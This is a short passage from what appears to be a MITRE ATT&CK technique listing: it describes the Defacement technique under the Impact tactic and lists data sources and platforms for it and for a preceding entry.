Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.
Tactics:	Impact
Data Sources:	Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre